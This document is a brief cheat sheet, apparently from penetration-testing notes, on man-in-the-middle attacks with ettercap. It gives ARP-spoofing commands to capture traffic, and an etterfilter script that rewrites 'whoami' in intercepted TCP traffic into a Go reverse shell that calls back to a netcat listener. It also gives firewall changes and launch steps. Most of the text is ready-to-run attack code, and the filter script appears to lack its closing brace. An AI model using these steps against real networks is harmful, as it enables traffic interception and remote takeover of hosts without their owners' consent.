MITM (Man in the Middle) Attack
Last modified: 2022-12-01
Establish MITM
Using ARP Spoofing
In the target machine,
# -T: text only GUI
# -M: man-in-the-middle attack
# -w: write .pcap file
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap
ettercap -T -i eth1 -M arp -w /tmp/ettercap.pcap
In your local machine, transfer the ettercap's output file.
scp victim@<target-ip>:/tmp/ettercap.pcap .
# Investigate the file
wireshark ettercap.pcap
Gain Access to a Shell
Reverse Shell Via ARP Spoofing
In the target machine, create "whoami.ecf" using Golang.
// whoami.ecf
if (ip.proto == TCP && tcp.src == 4444 && search(DATA.data, "whoami")) {
log(DATA.data, "/root/ettercap.log");
replace("whoami", "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<target-eth1-ip>:6666\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go &");
msg("###### ETTERFILTER: substituted 'whoami' with reverse shell. ######\n");
Compile the file using "etterfilter"
# Compile the file using etterfilter
etterfilter whoami.ecf -o whoami.ef
Open listener on background
nc -lvnp 6666 &
Disable Firewall for incoming connection
ufw allow in on eth1 from <target-ip> to <target-eth1-ip> port 6666 proto tcp
# or
ufw disable
Execute "ettercap" command.
# Run ettercap
# -F: Filter
ettercap -T -i eth1 -M arp -F whoami.ef
After a while, you should see "Connection received on <target-ip>" in the outputs.
If so, quit "ettercap" with "q" and switch the opening listener to foreground with "fg".
Then you can interecat with the target shell.
